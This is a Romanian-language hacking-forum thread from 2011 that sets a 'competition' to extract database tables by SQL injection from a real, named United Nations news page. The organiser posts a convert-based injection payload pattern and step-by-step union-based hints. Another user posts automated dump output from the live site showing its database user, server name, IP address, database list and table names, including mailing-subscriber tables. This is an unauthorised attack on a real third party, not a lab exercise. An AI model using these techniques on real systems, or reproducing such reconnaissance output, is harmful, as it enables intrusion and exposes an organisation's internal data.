[Hard] SQL Injection [2]

[vlad1395]

O noua competitie, care sper ca o sa va placa.

- Sintaxele nu se vor face publice, se vor trimite prin PM !

- Postati aici doar un screen-shot ca dovada ca ati rezolvat (fara a se vedea rezolvarea)

Cerere: Extrageti tabelele >5 .

Dificultate:Medium/Hard

Metoda: Union Based (NOT MsSQL Injection Method)

http://www.un.org/spanish/News/focus.asp?focusID=13

SURSA: HF

Proof:

Solvers

totti93

Edited June 2, 2011 by vlad1395

[luke999]

vlad...da-mi un pm cu rezolvarea...ca sunt curios cum ai facut ca la mine e moarte nush sa o rezolv ...deci te rog mult , astept pm, ms.

[totti93]

[vlad1395]

@luke999: sintaxele nu se vor face publice

@totti93: Competita era, sa folosesti "union select", nu "convert". Deasemenea, sintaxa ta arata doar primul si ultimul "table".Oicum, frumos gandit.

//LE: @luke999 si restul. Daca sunteti interesati de aceasta competie, " fiti pe faza ", voi posta niste hinturi in cateva zile. Totusi, cred ca este destul de grea. Bafta!

Edited June 2, 2011 by vlad1395

[totti93]

Ti-am dat PM cu sintaxa Union based...

[vlad1395]

HINT

========================

Pentru inceput trebuie sa realizati sintaxa astfel incat sa genereze o eroare care sa contina versiunea, baza de date etc. , dar in cazul nostru, trebuie sa aratam tabelele >5 folosind table_name from .... .

-----

Cand vedem erroarea:

[MERANT][[COLOR="Red"]ODBC[/COLOR] SQL Server Driver][SQL Server]Incorrect syntax near *.
[MERANT][ODBCSQL Server Driver][SQL Server]*

/spanish/News/focus.[COLOR="Red"]asp[/COLOR], line *

, imediat ne gandim la MsSQL Injection la pasii pe care va trebuii sa ii parcurgem. Pana aici totul e ok.

and 1=convert(int,(COMANDA))

De exemplu versionea bazei de date este:

 Microsoft SQL Server 2000 - 8.00.760 (Intel X86) 
Dec 17 2002 14:22:05 
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4), 

lucru care ne intereseaza mai putin. Revenind la tabele, obeservam ca nu se poate afla nicio tabela folosind convert, asa ca, in acest caz vom trece la Union Based.

Pasi:

- Numarati Coloanele

- Nu veti reusi sa faceti sa va apara pe pagina coloanele vulnerabile, asa ca va trebui sa le ghiciti (sunt cel putin doua), fiind putine nu va va lua prea mult timp sa faceti asta.

- Veti afla tabela tblsubject (atentie la caracterele folosite)

- Si insfarsit, pasul final: Avand in vedere ca exista un filtru destul de bun la acest site, va trebui practic sa uniti doua sintaxe, deci va trebui sa folositi doi operatori, plus un lucru foarte important care trebuie pus dupa NOT IN . (Vezi pasul 3).

(ATENTIE LA CE COMMENTURI FOLOSITI - FOARTE IMPORTANT).

---------------------------------------------------------------------

// Prima tabela pe care o veti obtine foarte usor daca ati respectat spusele de mine va fi: tblsubject, apoi, published. NU stiu ce numar au acestea, poate sunt aleatorii.

Sper ca v-am fost de ajutor, postati aici ce ati rezolvat. Sunt peste 4 variante de rezolvare complet diferite. Have a nice day!

Edited June 10, 2011 by vlad1395

[negrutidaniel]

********************************************************************

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ -== MSSQL Information Schema Harvest & Data Dumper ==- +

+-------------------------------------------------b-y--K-o-p-e-l-e-+

[ + ] URL : http://www.un.org/spanish/News/focus.asp?focusID=13

[ + ] Date: Tue Jun 7 22:06:05 2011

[ + ] Displaying information about MSSQL host !

[ + ] USER () : spwebnews

[ + ] S_USER () : spwebnews

[ + ] DB_NAME () : SpanishNews

[ + ] SERVER_NAME () : UNHQDB10

[ + ] SERVER_TYPE () : Apache/Not telling (Unix) AuthTDS/1.1

[ + ] IP_ADDRESS_INFO : 157.150.185.49

[ - ] We Can't get number of Databeses !

[ + ] Displaying list of 20 databases on this MSSQL host !

[ DATABASE: 0 ] : SpanishNews

[ DATABASE: 1 ] : master

[ DATABASE: 2 ] : tempdb

[ DATABASE: 3 ] : model

[ DATABASE: 4 ] : msdb

[ DATABASE: 5 ] : Press

[ DATABASE: 6 ] : RussianNews

[ DATABASE: 7 ] : arabNews

[ DATABASE: 8 ] : ChineseNews

[ DATABASE: 9 ] : ecosoc

[ DATABASE: 10 ] : SpanishNews

[ DATABASE: 11 ] : dept1

[ DATABASE: 12 ] : Radionews

[ DATABASE: 13 ] : UNFAQ

[ DATABASE: 14 ] : unsaocc

[ DATABASE: 15 ] : News

[ DATABASE: 16 ] : NewsF

[ DATABASE: 17 ] : wwatch

[ DATABASE: 18 ] : sg

[ DATABASE: 19 ] : DpiNgoAccred

[ + ] Displaying Tables inside DB: SpanishNews

[ TABLES: 0 ] : Countries_ALL

[ TABLES: 1 ] : dtproperties

[ TABLES: 2 ] : Mailing_listname

[ TABLES: 3 ] : Mailing_subscribe_tmp

[ TABLES: 4 ] : Mailing_subscriber_list

[ TABLES: 5 ] : Mailing_subscriber_profil

[ TABLES: 6 ] : Mailing_UNsubscribe_tmp

[ TABLES: 7 ] : sysconstraints

[ TABLES: 8 ] : syssegments

[ TABLES: 9 ] : tblfocus

[ TABLES: 10 ] : tblHighlight

[ TABLES: 11 ] : tblnews

[ TABLES: 12 ] : tblNews_Subject

[ TABLES: 13 ] : tblPhoto

[ TABLES: 14 ] : tblPhoto110304

[ TABLES: 15 ] : tblPhotoTmp

[ TABLES: 16 ] : tblregion

[ TABLES: 17 ] : tblsubject

[ TABLES: 18 ] : tblticker

[ TABLES: 19 ] : tblupdater

Sorry this is not Union Based , but just in case you like it .

Hi laggers